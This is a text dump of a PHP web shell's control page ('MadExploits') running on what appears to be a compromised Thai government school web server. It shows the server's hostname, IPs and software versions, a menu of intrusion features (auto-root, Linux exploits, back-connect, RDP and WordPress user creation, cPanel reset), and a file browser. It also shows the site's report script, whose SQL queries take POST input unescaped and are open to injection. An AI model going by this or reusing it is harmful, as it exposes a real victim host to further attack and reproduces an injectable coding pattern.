Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
dltv /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
add_object.php
5.38
KB
-rw-r--r--
object_report.php
3.57
KB
-rw-r--r--
object_type.php
9.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : object_report.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); if(!($result_permission['p1']==1)) { exit(); } if(!(isset($_REQUEST['dltv_type']))){ $_REQUEST['dltv_type']=""; } $officer=$_SESSION['login_user_id']; echo "<br>"; //ส่วนฟอร์มกำหนดปีการศึกษา if($_REQUEST['dltv_type']==""){ echo "<br />"; echo "<form id='frm1' name='frm1'>"; echo "<Center>"; echo "<Font color='#006666' Size='3'><B>เลือกชนิด วัสดุ อุปกรณ์</Font>"; echo "</Cener>"; echo "<Br><Br>"; echo "<Table width='300' Border='0'>"; echo "<Tr><Td align='right'> </Td>"; echo "<td><div align='center'><Select name='dltv_type' id='dltv_type' size='1'>"; $sql = "select * from dltv_object_type order by id"; $dbquery = mysqli_query($connect,$sql); echo "<option value = ''>เลือก</option>" ; While ($result = mysqli_fetch_array($dbquery)) { $id = $result['id']; $code= $result['object_code']; $name = $result['object_name']; echo "<option value = '$code'>$name</option>"; } echo "</select>"; echo "</div></td></tr>"; echo "<tr><td> </td><td> </td></tr>"; echo "<tr><td align='center' colspan='2'><INPUT TYPE='button' name='smb' value='ตกลง' onclick='goto_url2(1)' ></td></tr>"; echo "</Table>"; echo "</form>"; } //ส่วนแสดงหลัก if($index==1 or $index==4){ echo "<br />"; $sql = "select * from dltv_object_type where object_code='$_POST[dltv_type]' "; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); echo "<table width='50%' border='0' align='center'>"; echo "<tr align='center'><td align=center><font color='#990000' size='3'><strong>รายงานข้อมูล</strong></font></td></tr>"; echo "<tr align='center'><td align=center><font color='#2E2E2E' size='3'><strong>$result[object_name]</strong></font></td></tr>"; echo "</table>"; echo "<br />"; echo "<form id='frm1' name='frm1'>"; $sql = "select * from system_school where school_type='1' order by school_code"; $dbquery = mysqli_query($connect,$sql); echo "<table width='50%' border='1' align='center' style='border-collapse: collapse'>"; echo "<Tr bgcolor='#E6E6E6' align='center'><Td width='50'>ที่</Td>"; echo "<Td>รหัส</Td><Td>ชื่อโรงเรียน</Td><Td>จำนวน</Td></Tr>"; $N=1; $M=1; echo "<input type='hidden' name='dltv_type' id='dltv_type' value='$_REQUEST[dltv_type]'>"; While ($result = mysqli_fetch_array($dbquery)) { if(($M%2) == 0){ $color="#FFFFC"; } else { $color="#FFFFFF"; } $school_code= $result['school_code']; $school_name= $result['school_name']; $sql_object = "select * from dltv_equipment where equipment_type='$_POST[dltv_type]' and school_code='$school_code'"; $dbquery_object = mysqli_query($connect,$sql_object); $result_object = mysqli_fetch_array($dbquery_object); $equipment_num=$result_object['equipment_num']; echo "<tr bgcolor='$color' align='center'><td>$N</td><td>$school_code</td><td align='left'>$school_name</td><td>$equipment_num</td></tr>"; $M++; $N++; } echo "</Table>"; echo "<br>"; echo "</form>"; } ?> <script> function goto_url2(val){ if(val==1){ if(frm1.dltv_type.value == ""){ alert("กรุณาเลือกชนิดวัสดุ อุปกรณ์"); }else{ callfrm("?option=dltv&task=main/object_report&index=1"); } } } </script>
Close
